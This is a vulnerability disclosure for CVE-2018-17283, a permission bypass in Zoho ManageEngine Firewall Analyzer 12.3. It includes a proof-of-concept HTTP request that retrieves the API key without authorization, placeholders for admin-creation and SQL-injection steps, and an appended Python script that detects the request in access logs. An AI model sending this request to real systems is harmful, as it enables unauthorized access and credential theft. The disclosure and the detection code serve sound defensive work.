Firewall Analyzer 12.3 Build 123183 has a permission bypass vulnerability which can lead to information disclosure and SQL injection.
Proof of Concept:
Getting the API key without authorization:
GET /oputilsServlet?action=getAPIKey HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
x-f1v3 changed the title from "Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection" to "[CVE-2018-17283]Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection" on Sep 29, 2018
Zoho ManageEngine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection
Date: 2018/09/03
Software Link: https://www.manageengine.com/products/firewall/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn
Firewall Analyzer 12.3 Build 123183 has a permission bypass vulnerability which can lead to information disclosure and SQL injection.
Proof of Concept:
Getting the API key without authorization:
Local site test:

Adding an admin user using only the API key (PoC):
Local site test:

SQL injection using only the API key (PoC):
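Added detection example (not part of the report above): the report's first step is an unauthenticated GET to the getAPIKey action of /oputilsServlet, so a defender can sweep web server access logs for that request. The log lines below are constructed in Apache/Tomcat combined log format, and the matching is case-insensitive on path and query because a servlet may accept either spelling; the log format carries no session state, so every hit is reported with its status code for review.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not taken from the original report).
SAMPLE_LOG = """\
10.0.0.5 - - [03/Sep/2018:10:15:21 +0000] "GET /oputilsServlet?action=getAPIKey HTTP/1.1" 200 87 "-" "curl/7.61.0"
10.0.0.9 - - [03/Sep/2018:10:15:25 +0000] "GET /index.jsp HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Sep/2018:10:15:30 +0000] "GET /OputilsServlet?ACTION=GetApiKey HTTP/1.1" 200 87 "-" "curl/7.61.0"
10.0.0.7 - - [03/Sep/2018:10:16:02 +0000] "POST /oputilsServlet?action=getAPIKey HTTP/1.1" 403 0 "-" "python-requests/2.19"
"""

# Combined log format: client ip, identd, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def is_apikey_fetch(target: str) -> bool:
    """True when the request target is the API-key retrieval action named in the report."""
    parts = urlsplit(target)
    if parts.path.lower() != "/oputilsservlet":
        return False
    # Normalise parameter names and values so case variations do not evade the check.
    params = {k.lower(): [v.lower() for v in vs] for k, vs in parse_qs(parts.query).items()}
    return "getapikey" in params.get("action", [])


def find_apikey_requests(log_text: str) -> list:
    """One finding per request for the API key; a 200 on an unpatched host means the key was handed out."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_apikey_fetch(m["target"]):
            continue
        findings.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "method": m["method"],
            "status": int(m["status"]),
        })
    return findings


if __name__ == "__main__":
    for f in find_apikey_requests(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['method']} getAPIKey -> {f['status']}")
```

Any 200 response to this action from a client that holds no session is the indicator of the bypass; after patching, the same sweep confirms the endpoint now rejects such requests.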